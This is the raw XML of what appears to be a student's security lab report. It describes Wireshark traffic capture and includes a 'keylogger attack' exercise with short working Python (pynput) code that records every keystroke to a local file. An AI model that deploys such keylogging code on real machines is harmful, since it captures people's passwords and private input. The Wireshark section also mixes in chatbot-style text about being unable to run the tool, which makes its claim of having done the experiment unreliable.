    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E1">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E2">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E3">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E7">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E8">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pP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rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>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b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extra Experiment 3</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Aim:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement Wireshark as Network Packet Analyzer and analyze network traffic.</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u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Introduction: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Wireshark is a complex and powerful network packet analyzer that requires specific software installation and usage on a local machine. It's not something that can be implemented or executed within a text-based environment like this one.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To use Wireshark as a network packet analyzer, you would typically follow these steps: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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1:  Download and Install Wireshark: Go to the official Wireshark website (</w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">https://www.wireshark.org/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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="4318000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000102">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000103">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: Launch Wireshark: After installation, launch Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000104">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000105">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Capture Network Traffic: Start a new capture session by selecting a network interface (e.g., Ethernet, Wi-Fi) and clicking the "Start" button. Wireshark will begin capturing network packets.</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             </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="425450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ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View Packet Details: You can click on individual packets to view detailed information about each packet, including its source and destination, protocol used, and the content of the packet.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Apply Filters: You can apply filters to narrow down the packets you want to analyze. For example, you can filter by IP address, port number, dns, udp, tcp.</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w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4462947" cy="2509322"/>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462947" cy="250932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272088" cy="2968833"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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72088" cy="296883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1200" cy="3225800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="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1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Analyse Packets: Once you've captured some packets, you can stop the capture and start analysing the data. </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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this experiment, I implemented Wireshark as a network packet analyzer and captured the Networks and analysed the network traffic.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="374151"/>
          <w:shd w:fill="f7f7f8" w:val="clear"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> I also tried applying filters </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to narrow down the packets and helps better analysis</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000120">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000121">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000122">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000123">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000124">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000125">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000126">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000127">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000128">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000129">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012A">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012B">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012C">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012D">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000130">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000131">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000132">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000133">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Extra Experiment 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000134">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:u w:val="single"/>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AIM:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000136">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Study of malicious software using tools: Implement a Keylogger attack using a keylogger tool.</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THEORY:</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Keyloggers are a type of malicious software that record every keystroke made on a computer. They can be used to steal sensitive information such as passwords, credit card numbers, and other personal data. They can be implemented using various tools, and in this case, we'll use a Python-based tool called Pynput. This tool allows us to control and monitor input devices.</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CODE:</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from pynput import keyboard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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def keyPressed(key):</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print(str(key))</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with open("keyfile.txt", 'a') as logKey:</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try:</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char = key.char</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logKey.write(char)</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except:</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print("Error getting char")</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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if __name__ == "__main__":</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listener = keyboard.Listener(on_press=keyPressed)</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listener.start()</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    input()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OUTPUT:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000014E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5434013" cy="3213382"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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434013" cy="321338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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="2533650" cy="876300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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5336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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3781425" cy="1323975"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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7814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CONCLUSION:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000156">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Thus, we have implemented a keylogger attack using a keylogger tool.</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:h="15840" w:w="12240" w:orient="portrait"/>
      <w:pgMar w:bottom="90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png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wireshark.org/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1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4.png"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.google.com" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 